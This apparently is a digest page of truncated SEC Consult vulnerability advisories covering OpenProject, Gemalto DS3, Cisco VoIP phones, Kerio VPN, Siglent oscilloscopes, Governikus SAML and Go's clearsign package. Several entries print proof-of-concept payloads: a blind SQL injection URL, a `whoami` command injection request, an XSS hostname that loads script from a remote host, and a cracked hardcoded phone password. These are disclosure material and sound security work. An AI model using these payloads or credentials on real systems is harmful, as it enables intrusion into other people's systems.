chapter 7 the cleartext signed message can contain one or more optional "Hash" Armor Headers. The "Hash" Armor Header specifies the message digest algorithm(s) used for the signature. However, the package "clearsign" in supplementary Go cryptography libraries ignores the value of this header which allows an attacker to spoof it. Thereby an attacker can lead a victim to believe the signature was generated using a different message digest algorithm than what was actually used. Moreover, since the library skips Armor Header parsing in general, an attacker can not only embed arbitrary Armor Headers, but also prepend arbitrary text to cleartext messages without invalidating the signatures. Proof of concept: - 1) Cleartext message spoofing The following cleartext message with a valid SHA-1 signature was generated using GnuPG: (content of no_spoof.asc file): -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Message to be signed -BEGIN PGP SIGNATURE- iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO +u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq 9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N 0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+ 7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7 v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg== =Bb6N -END PGP SIGNATURE- Then the message was tampered by changing the value of the "Hash" Armor Header from SHA-1 to SHA-512: (content of hash_spoof.asc file): -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Message to be signed -BEGIN PGP SIGNATURE- iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO +u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq 9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N 0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+ 7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7 v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg== =Bb6N -END PGP SIGNATURE- Finally, a string containing Unicode-encoded "LINE TABULATION" was embedded in the Armor Header of the message: (content of cleartext_spoof.asc file): -BEGIN PGP SIGNED MESSAGE- Hash: SHA512\u000bThis data is part of the header Message to be signed -BEGIN PGP SIGNATURE- iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO +u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq 9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N 0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+ 7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7 v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg== =Bb6N -END PGP SIGNATURE- When inserting the "LINE TABULATION" character, the header text after the attached character looks as if it were p
SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20190510-0 > === title: Unauthenticated SQL Injection vulnerability product: OpenProject vulnerable version: 5.0.0 - 8.3.1 fixed version: 8.3.2 & 9.0.0 CVE number: CVE-2019-11600 impact: Critical homepage: https://www.openproject.org found: 2019-04-17 by: T. Soo (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure." Source: https://www.openproject.org/ Business recommendation: The vendor provides a patch which should be applied immediately. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- An SQL injection vulnerability has been identified in the web "activities API". An unauthenticated attacker could successfully perform an attack to extract potentially sensitive information from the database if OpenProject is configured not to require authentication for API access. Proof of concept: - Requesting the following URL will trigger a time delay as a proof of concept for exploiting the blind SQL injection: http:///api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(%3d Vulnerable / tested versions: - The vulnerability has been identified in OpenProject version 8.3.1 which was the most current version at the time of discovery. According to the vendor all versions between 5.0.0 and 8.3.1 are affected. Older versions (< 5.0.0) are not vulnerable. Vendor contact timeline: 2019-04-30: Contacting vendor through secur...@openproject.com 2019-04-30: A patch is published in version 8.3.2 2019-05-06: Vendor publishes further details 2019-05-10: Release of security advisory Solution: - The vendor provides a patched version 8.3.2 and a security notice with further information: https://www.openproject.org/release-notes/openproject-8-3-2 https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Thanaphon Soo / @2019 smime.p7s Description: S/MIME Cryptographic Signature
SEC Consult SA-20190509-0 :: Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
SEC Consult Vulnerability Lab Security Advisory < 20190509-0 > === title: Multiple Vulnerabilities product: Gemalto (Thales Group) DS3 Authentication Server / Ezio Server vulnerable version: Ezio DS3 server https://www.gemalto.com found: 2019-02-11 by: TING Meng Yean (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- DS3 Authentication Server is an appliance that provides authentication and end-to-end encryption for online banking and remote transactions. DS3 has been acquired by Gemalto, and the Authentication Server is now known as the Gemalto Ezio Server. Gemalto is now part of the Thales Group. Source: http://www.fisid.ch/products/ds3-main-products.html Source: https://www.gemalto.com/financial/ebanking/ezio-server Source: https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital Business recommendation: The vendor provides a patch and users of this product are urged to upgrade to the latest version available. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- The DS3 Authentication Server is prone to several security issues as described below that when combined, allows a low-privileged application user to upload a JSP web shell with the access rights of the lower privileged Linux system user "asadmin". The CVSSv3 scores have been provided by the vendor. 1) Semi-Blind OS Command Injection (Post-authenticated) - CVE-2019-9156 - CWE-78 - CVSSv3: 6.8 (Medium) https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L The DS3 Authentication Server provides several administration tools to perform connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an attacker to execute arbitrary commands on the server side with the privileges of the local system user "asadmin". 2) Limited Local File Disclosure (LFD) (Post-authenticated) - CVE-2019-9157 - CWE-538 - CVSSv3: 5.7 (Medium) https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N The DS3 Authentication Server provides several administration tools to check the system's access and error logs. "TailLogs.jsp" does not correctly validate the user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary local files with the privileges of the local system user "asadmin". 3) Broken Access Control (Post-authenticated) - CVE-2019-9158 - CWE-284 - CVSSv3: 5.7 (Medium) https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N The DS3 Authentication Server provides several permission groups, granting different levels of privileges, from the administrative "dsssAdmin" group to the low privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see more functions in the menu of the web portal than a user with the "READ_ONLY" group. However, the user with the "READ_ONLY" group can access some "dsssAdmin" functions by replaying the POST or GET request directly. Proof of concept: - 1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156) This POC was performed using a user with the "READ_ONLY" group permission. This exploit also has the following two restrictions: 1) The bash commands injected cannot contain any space (' '/%20). 2) The output of the bash commands injected must be null or cannot contain any space (' '/%20). However, the tester was able to create complex bash commands payload without any space (' '/%20) by using a bash trick. The simple OS command payload "whoami" injected into the "HOST_NAME" parameter and the HTTP response with the result of the payload "asadmin" mixed in. Please note that the OS command payload is enclosed with the `` characters. POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1 Host: $IP Cookie: JSESSIONID= Content-Type: application/x-www-form-urlencoded Content-Length: 132 CSRFTOKEN=_NAME=127.0.0.1`whoami`_NUMBER=8443_RESULTS=%0D%0A%09%09%09%09%09%09 HTTP/1.1 200 OK Str
SEC Consult SA-20190205-0 :: Multiple vulnerabilities in OSCI-Transport Library 1.2 for German e-Government
A blog post with further information has been released on this topic as well: https://r.sec-consult.com/osci SEC Consult Vulnerability Lab Security Advisory < 20190205-0 > === title: Multiple vulnerabilities product: OSCI-Transport Library 1.2 for German e-Government vulnerable version: <=1.8.1 fixed version: 1.8.3 CVE number: - impact: low - critical (highly dependent on the usage scenario) homepage: http://www.xoev.de found: 2018-09 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- (German) "Mit der Spezifikation des Protokolls OSCI–Transport in der Version 1.2 wird ein sicheres, herstellerunabhängiges und interoperables Datenaustauschformat beschrieben. Um die Implementierung für Anwender in der öffentlichen Verwaltung sowie der Fachverfahrenshersteller zu erleichtern, wird die OSCI 1.2 Bibliothek angeboten: Die Bibliothek implementiert OSCI–Transport in der Version 1.2 und ist damit unabhängig von Fachinhalten. Sie ist Bestandteil der OSCI-Transport Infrastruktur. Die OSCI-Transport-Bibliothek soll in Fachverfahren (auf Verwaltungsseite) oder Clientsystemen (auf Kundenseite) implementiert werden." Source: https://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310 Business recommendation: The OSCI 1.2 Transport Library is intended to provide a secure message exchange channel over an untrusted network (i.e. the Internet) for German government agencies. In 2017 SEC Consult found several critical security vulnerabilities in the OSCI 1.2 Transport library version 1.6.1. These vulnerabilities have been addressed in version 1.7.1. Further details to these vulnerabilities can be found here: https://www.sec-consult.com/en/blog/2017/06/german-e-government-details-vulnerabilities/ In 2018 SEC Consult identified vulnerabilities in this library again. An attacker could use these vulnerabilities to forge signatures of request-and-response-signed and request-and-response-encrypted messages. Whether there is an impact to the content-signature and content-encryption was not fully examined! As the newly identified vulnerabilities are similar to the vulnerabilities identified in 2017 and due to high complexity of this library, SEC Consult suspects further vulnerabilities that have not yet been discovered. Therefore, SEC Consult, strongly recommends KoSIT and its partners to conduct a full security audit of the software component. Vulnerability overview/description: --- 1) Insecure Cryptographic Algorithm KoSIT is in the process of replacing legacy encryption algorithms with AES-GCM. Currently, the OCSI 1.2 Transport library still supports the following legacy encryption algorithms: * http://www.w3.org/2001/04/xmlenc#tripledes-cbc * http://www.w3.org/2001/04/xmlenc#aes128-cbc * http://www.w3.org/2001/04/xmlenc#aes192-cbc * http://www.w3.org/2001/04/xmlenc#aes256-cbc All of these algorithms are no longer recommended by the W3C: "Note: Use of AES GCM is strongly recommended over any CBC block encryption algorithms as recent advances in cryptanalysis [...] have cast doubt on the ability of CBC block encryption algorithms to protect plain text when used with XML Encryption" (https://www.w3.org/TR/xmlenc-core1/) Although these have been marked as deprecated, AES256-CBC is still used by default (see Constants.DEFAULT_SYMMETRIC_CIPHER_ALGORITHM). The Padding Oracle attack that was demonstrated previously by SEC Consult was found to be no longer exploitable trivially. However, another approach was found that allows an attacker to bypass transport encryption. This attack abuses the fact that the server leaks whether a decrypted string contains a colon (more specifically whether it is a valid MIME-Header in the form of :). By sending multiple requests and observing whether the decrypted string contains a colon, an attacker can narrow down the possible values for a single plain text character. When the number of possible values is one, the plain text byte is known. The attacker can use this approach to decrypt all characters of a given cipher text. 2) Signature Bypass SEC Consult previously demonstrated an XML Signature Wrapping attack. While this exact attack is no longer possible, another similar attack was identified. XML signatures are constructed as follows: * an element "SignedInfo" contains multiple "Reference" elements, each referring to a signed element. The contents
SEC Consult SA-20190124-0 :: Cross-site scripting in CA Automic Workload Automation Web Interface (AWI)
SEC Consult Vulnerability Lab Security Advisory < 20190124-0 > === title: Cross-site scripting product: CA Automic Workload Automation Web Interface (AWI) (formerly Automic Automation Engine, UC4) vulnerable version: 12.0, 12.1, 12.2 fixed version: 12.0.6 HF2, 12.1.3 HF3, 12.2.1 HF1 CVE number: CVE-2019-6504 impact: medium homepage: https://www.ca.com found: 2018-10-15 by: Marc Nimmerrichter (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "The modern enterprise needs to orchestrate a complex, diverse landscape of applications, platforms and technologies. Workload automation can prove a critical differentiator, but only if it provides intelligent automation driven by data analytics. [...] CA Automic Workload Automation gives you the agility, speed, visibility and scalability needed to respond to the constantly changing technology landscape. It centrally manages and automates the execution of business processes end-to-end; across mainframe, cloud and hybrid environments in a way that never stops—even when doing an upgrade to the next version." Source: https://www.ca.com/us/products/workload-automation-solution.html Business recommendation: Be aware that restrictions on privileges can be bypassed and that attackers may be able to take over other users' accounts. SEC Consult recommends to apply the vendor patch as soon as possible. Vulnerability overview/description: --- The Automation Engine Web Interface, short AWI, is susceptible to a persistent cross-site scripting attack (XSS). The origin of this vulnerability is in an outdated version of the Vaadin framework (version 7.7.9), which is heavily used in the implementation of the UI. This version of the Vaadin framework is vulnerable to an XSS vulnerability in tooltips [1]. If attackers can control the content of tooltips created with the framework, they can execute arbitrary JavaScript code in the context of the user viewing the tooltip. AWI uses tooltips for various data-fields, e.g. for the title of objects created. Thus, if a user has the privilege to create or edit objects, they can inject JavaScript code, which will get executed by other users if they move their cursor over the text containing the tooltip. [1] https://github.com/vaadin/framework/issues/8731 Proof of concept: - The vulnerability can be reproduced by creating/editing any object in AWI and using a normal JavaScript payload, e.g. with an onerror handler. Because tooltips are only shown in AWI when the text length exceeds the column width, the text needs to be padded with some sample-text to make sure the JavaScript code gets executed. Vulnerable / tested versions: - The tested version of AWI was 12.2.0. Vendor contact timeline: 2018-10-18: SEC Consult contacts vendor through v...@ca.com via encrypted email. 2018-10-25: Vendor confirms the receipt of the vulnerability information. 2018-11-22: Vendor confirms the vulnerability and asks for postponement of advisory release date. 2018-12-11: Vendor provides planned patch numbers. 2018-01-17: Vendor informs SEC Consult that patches have been published. 2019-01-18: CA Technologies and SEC Consult define January 24th 2019 as release date for SEC Consult advisory and CA Technologies Security Notice. 2019-01-24: Public release of security advisory Solution: - The vendor provides patched versions: Automic.Web.Interface 12.0.6 HF2 Automic.Web.Interface 12.1.3 HF3 Automic.Web.Interface 12.2.1 HF1 Available from: https://downloads.automic.com/ The vendor released a security advisory which is available here: https://support.ca.com/us/product-content/recommended-reading/security-notices/CA20190124-01-security-notice-for-ca-automic-workload-automation.html Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive tech
SEC Consult SA-20190109-0 :: Multiple Vulnerabilities in Cisco VoIP Phones (88xx series)
SEC Consult Vulnerability Lab Security Advisory < 20190109-0 > === title: Multiple Vulnerabilities product: Cisco VoIP Phones, e.g. models 88XX vulnerable version: See list of vulnerable devices/firmwares below fixed version: 12.5.1 MN CVE number: CVE-2018-0461 impact: high homepage: https://www.cisco.com found: 10/2018 by: W. Schober, IoT Inspector (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes seeking secure, high-quality, full-featured VoIP. Select models provide affordable entry to HD video and support for highly-active, in-campus mobile workers." Source: https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html Business recommendation: SEC Consult recommends to update the devices to the newest firmware (12.5.1 MN), where all the documented issues are fixed according to the vendor. We want to thank Cisco for the very professional response and great coordination. Vulnerability overview/description: --- 1) Arbitrary Script Injection The VOIP phones can be managed directly via the integrated keyboard and the built-in screen. In the configuration menu a few spots allow users to input text via the integrated keyboard into text boxes (e.g. Hostname). Those text input fields are prone to JavaScript-like code injection. An attacker is able to inject arbitrary payloads via the T9 keyboard. 2) Hard coded and weak secrets (Identified during an automated firmware analysis by IoT Inspector) The firmware, which is directly served from Cisco, contains multiple hard coded password hashes. They are stored in the /etc/passwd file and are hashed using an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere. Access via SSH using those credentials is possible. Due to the outdated algorithm in use (UNIX MD5+Salt) and the very weak password it was easily possible to brute-force the password within seconds. 3) Undocumented debug functionality During a manual firmware analysis a few undocumented endpoints in the built-in web application, which is running on the VOIP phone, were identified. Those routes lead to parts of the web application that are neither documented nor officially mentioned anywhere by Cisco. Those parts of the web application allow an attacker to debug the device and create memory dumps. 4) Various outdated components with known vulnerabilities During the check a lot of outdated components were identified by their version numbers. It is not known which patches got backported by the vendor but Cisco mentioned that they have implemented some. The potentially affected components are: -) wpa_supplicant -) BusyBox -) Dnsmasq -) OpenSSL -) OpenSSH -) Linux Kernel Privilege Escalation “pp_key” -) Linux Kernel Privilege Escalation “Mempodipper” -) Multiple Linux Kernel CVE entries Please take a look at the IoT Inspector report for details: https://r.sec-consult.com/iotinspectorcisco Proof of concept: - 1) Arbitrary Script Injection A lot of settings can be changed directly on the VOIP phone via the built-in screen. There are also multiple locations, where user-input is parsed and displayed. It was possible to inject arbitrary (JavaScript) code directly into the phone UI. As an example the hostname of the VOIP Phone can be changed to the following value: hostname“>http://$IP/sec.js onload=exec()> The sec.js gets loaded from the remote host immediately and the exec function is executed. < A screenshot can be found online on our website > Further analysis has not been performed, but depending on the underlying libraries/system in use, it might be possible to get system level access via this attack vector. 2) Hard coded and weak secrets The file at the following path contains a hard coded password for the user debug: /_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd $1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix)) This hash corresponds to the following clear-text password: debug The password for the user root and default is also stored in the /etc/passwd: nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default 3) Undocumented debug functionality The built-in VOIP phone web server offers multiple functionalities for the end-user. During a manual analysis, undocumented endpoints with critical functionality got identified. The functionality can be found by visiting the following endpoint:
SEC Consult SA-20181205-0 :: Inadequate cryptography implementation in Kerio Control VPN protocol
SEC Consult Vulnerability Lab Security Advisory < 20181205-0 > === title: Inadequate cryptography implementation product: Kerio Control VPN protocol vulnerable version: <=9.2.7 fixed version: 9.2.8 CVE number: - impact: High homepage: http://www.kerio.com/products/kerio-control found: 2018-10 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Protect your network from viruses, malware and malicious activity with Kerio Control, the easy-to-administer yet powerful all-in-one security solution. Kerio Control brings together next-generation firewall capabilities -- including a network firewall and router, intrusion detection and prevention (IPS), gateway anti-virus, VPN, and web content and application filtering. These comprehensive capabilities and unmatched deployment flexibility make Kerio Control the ideal choice for small and mid-sized businesses." "Link headquarters to remote users and branch offices securely and easily. Kerio’s own VPN tunneling with dead-simple setup requires minimal configuration, and provides a high performance network connection. Or, use industry-standard IPsec/L2TP for connectivity from mobile devices or third-party firewalls. Enable 2-step verification for an extra layer of security on all forms of remote access." Source: http://www.kerio.com/products/kerio-control Business recommendation: During a quick evaluation of the Kerio Control VPN protocol, it was apparent, that the cryptographic protocol employed exhibited severe design issues. Generally, SEC Consult strongly recommends to prefer well-established standard cryptographic protocols rather than proprietary protocols wherever possible (e.g. DTLS, IPsec). Due to their widespread use, they generally receive much greater attention by experts. Therefore, many design issues with these protocols have already been detected and mitigated since. We therefore recommend businesses to switch from Kerio's proprietary VPN protocol to a standard protocol (Kerio Control e.g. supports IPsec). Note that no full audit of Kerio Control, Kerio VPN or the cryptographic protocol has been conducted. In addition to the vulnerabilities described here, we already identified critical vulnerabilities in Kerio Control in 2016. Hence we suspect there are more major security deficiencies in the product. We therefore recommend GFI software to greatly increase the efforts towards product security in order to keep customers secure. We want to explicitly thank GFI for the professional handling of the communication during this whole process. Vulnerability overview/description: --- After a TLS connection is established between the Kerio VPN client and the Kerio Control appliance and cryptographic keys have been securely transferred over this connection, the data sent through the VPN is transmitted in UDP packets. Each of these packets is encrypted using Blowfish in CTR mode. As this mode does not provide data authenticity, encrypted data that is modified by an attacker results in predictable modification of the plaintext. More precisely, bits that are flipped in the ciphertext result in the same bits being flipped in the plaintext after decryption. Each encrypted UDP datagram contains a simple checksum (the same checksum used by IPv4). Assuming an attacker knows the plaintext data of a datagram and is able to modify its ciphertext, it is trivial to change parts of the message, e.g. inject content into the encrypted stream, while keeping the resulting checksum identical. Proof of concept: - SEC Consult provided a proof of concept exploit script to GFI but it has been removed from this advisory in order to give customers more time to upgrade the infrastructure. Vulnerable / tested versions: - The version 9.2.7 build 2921 was found to be vulnerable. This version was the latest at the time of discovery and older versions are affected as well. Vendor contact timeline: 2018-10-17: Creating support case at https://gfisoftware.force.com, asking for security contact 2018-10-17: GFI support: Asking to upload advisory to support portal 2018-10-19: Uploading advisory 2018-10-22: GFI support: Escalated to engineers to further investigate 2018-10-25: GFI support acknowledges vulnerability 2018-11-08: GFI support: Beta version with patch available (with AES 128) 2018-11-09: Asking for release date of the patch 2018-11-12: GF
SEC Consult SA-20181130-0 :: Multiple Vulnerabilities in Siglent Technologies SDS 1202X-E Digital Oscilloscope
SEC Consult Vulnerability Lab Security Advisory < 20181130-0 > === title: Multiple Vulnerabilities product: Siglent Technologies SDS 1202X-E Digital Oscilloscope vulnerable version: V5.1.3.13 fixed version: - CVE number: - impact: High homepage: http://siglenteu.com/ https://www.siglent.eu/ https://www.siglentamerica.com/ found: 2018-08-06 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "SIGLENT is an international high-tech company, concentrating on R, sales, production and services of measurement products. As an ISO9001:2000 International Quality Management System and ISO 14001:2004 Environmental Management System Certified company, SIGLENT is also a member of the China Electronic Instrument Industry Association and Guangdong Instrument Representative Association. [...] SIGLENT focuses on the electronic test & measurement instrument industry and sees research & development as a core competency, while keeping a strong competitive edge through technology innovation and strict quality control. Try a Siglent product. Then compare the performance and the features to any other model, any other brand. Then compare the price. We believe there is no better value anyplace." Source: http://www.siglenteu.com/about.aspx Business recommendation: The identified backdoor accounts are accessible through Telnet, hence a compromise of the device via a local network attack is possible. Any malicious modification of measurement values may have serious impact on the product or service which is created or offered by using this oscilloscope. Therefore, all procedures which are executed with this device are untrustworthy. SEC Consult recommends not to use this product within a network of a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. The vendor was unresponsive and did not provide a patch. Vulnerability overview/description: --- 1) Hardcoded Backdoor Accounts Two backdoor accounts are present on the system. A Telnet service is listening on port 23 which enables an attacker to connect as root to the oscilloscope via LAN. The password hashes are hardcoded and are difficult to change for the end user because the "shadow" file is stored on a cramfs (intentionally write-only) file system. 2) Missing Authentication / Design Issue The software "EasyScopeX" can be used from any computer in the network to configure and interact with the oscilloscope. This is possible without prior authentication which enables everyone to change settings on the oscilloscope. 3) Unencrypted Communication The software "EasyScopeX" communicates via unencrypted TCP packets with the client computer / oscilloscope. 4) Outdated and Vulnerable Software Components Multiple software components embedded in the firmware are outdated and found to be vulnerable to various publicly known security issues. Proof of concept: - 1) Hardcoded Backdoor Accounts The following password hashes were dumped from "/etc/shadow" by connecting to the UART interface on the PCB: root siglent (The password hashes have been removed from this advisory) 2) Missing Authentication / Design Issue It is sufficient to install the "EasyScopeX" software and control the oscilloscope without any authentication. 3) Unencrypted Communication The software "EasyScopeX" communicates in plaintext via various ports by using the portmapper. The default ports are "5024" and "5025". 4) Outdated and Vulnerable Software Components Using the IoT Inspector software we found the following outdated and vulnerable components: * BusyBox 1.20.1 * GNU glibc 2.13 * Linux Kernel 3.19.0 Vulnerable / tested versions: - The following device / firmware version has been tested: * Siglent SDS1202X-E (V5.1.3.13) It is assumed that other firmware versions are affected as well. Vendor contact timeline: 2018-08-22: Contacting German VDE CERT for coordination support 2018-09-04: Asking for a status update from the vendor 2018-09-05: VDE CERT: no response from vendor yet 2018-09-12: US sales person from Siglent has answered, VDE CERT is sending advisory to be forwarded to engineering 2018-10-10: Asking for a status update (affected versions, etc) 2018-10-10
SEC Consult SA-20181121-0 :: Signature Bypass / Authentication Bypass in Governikus Autent SDK
An additional blog post has been published on this topic as well: English version: https://r.sec-consult.com/governikus German version: https://r.sec-consult.com/gov SEC Consult Vulnerability Lab Security Advisory < 20181121-0 > === title: Signature Bypass / Authentication Bypass product: Governikus Autent SDK vulnerable version: <=3.8.1 fixed version: 3.8.1.2 CVE number: - impact: critical homepage: https://www.governikus.de/ found: 2018-06 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- German original, translated to English: "In the course of digitization, electronic identities have become indispensable. At the same time, the requirements for protection, handling with regard to legal security and the federation of electronic identities are increasing. With Governikus Autent, server and client components are available to ensure authentication through electronic identities. Governikus Autent meets all the requirements of a modern identity management solution.” Source: https://www.governikus.de/produkte-loesungen/governikus-autent-und-ausweisapp2/ Business recommendation: During a short crash test SEC Consult identified a critical vulnerability in the Governikus Autent SDK nPA authentication code (German id card authentication). This vulnerability could allow an attacker to impersonate any German citizen on a vulnerable web application. SEC Consult recommends to immediately apply the workaround described below or apply the patch provided by the vendor. Moreover, SEC Consult recommends web application providers to check historic log files for evidence of this attack. SEC Consult recommends conducting a thorough source code security review on the Governikus Autent components as they are integral for the security of many web applications. Vulnerability overview/description: --- The software component tested is used by web applications to integrate nPA authentication (authentication using the German official id document). As the last step of an authentication transaction, the web application the user authenticates against receives a string containing all relevant data about the citizen (e.g. first name, last name). As this string is signed by a trusted party (an eID server), the application can verify the authenticity of this string. The component in the web application that is supposed to verify this signature can be tricked into accepting a string that has been modified. An attacker that has acquired a single legitimately signed string can use this to authenticate as any German citizen to any web application that trusts the eID server's signature. An attacker could acquire such a signed string by hosting a web application and tricking a victim to authenticate, by gaining access to a signed string sent to a legitimate web application (man-in-the-middle attack, getting access to the access log) or by authenticating against a web application using his own id document. Proof of concept: - 1. Signature Bypass During the last step of the NPA transaction, the user is redirected to the SAML receiver of the web application she tried to authenticate against. The SAML response is sent as a URL parameter: https:///?SAMLResponse==<...>== According to the demo application, the first verification a SAML receiver is meant to do is call the method HttpRedirectUtils.checkQueryString passing the query string (as it is returned by request.getQueryString()). If this method returns false, the signature could not be verified. This method internally deconstructs the query string into individual parameters, reconstructs the query string and then verifies the signature. If however, the query string contains multiple parameters of the same name, only the last occurrence of a parameter is built into the query string the signature is verified against. Therefore, if a query string is constructed like following, the first SAML response is ignored during signature verification: ...?SAMLResponse==... Afterwards, when the SAML response is processed, the application is likely to use the method ServletRequest.getParameter() to retrieve the SAML response (the demo application which is meant to show the integration of the library also does this). As per the specification of this method, the application server is supposed to return the first parameter value, if multiple parameters with the same name were sent. Thus, the signature is verified against t
SEC Consult SA-20181116-0 :: Multiple critical vulnerabilities in Miss Marple Enterprise Edition
SEC Consult Vulnerability Lab Security Advisory < 20181116-0 > === title: Multiple critical vulnerabilities product: Miss Marple Enterprise Edition vulnerable version: <2.0 fixed version: 2.0 CVE number: CVE-2018-19233, CVE-2018-19234 impact: Critical homepage: www.comparex-group.com found: 2018-05-29 by: Marius Schwarz (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "As a global IT company with thirty years of experience, COMPAREX is one of the world’s leading IT service providers and no. 1 software license management company in the EMEA markets. COMPAREX develops innovative services that support management and leverage software products, leading to an overall improvement of workforce productivity. COMPAREX serves corporate customers spanning from small businesses to large international corporations as well as the public institutions supporting every customer during their digital journey towards productivity optimization. The portfolio has a solid foundation in license management, software procurement and cloud services. Substantial professional and managed services complete the portfolio to support customers with services tailored to their business demands." Source: https://comparexusa.com/about-us/about/ Business recommendation: The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available. 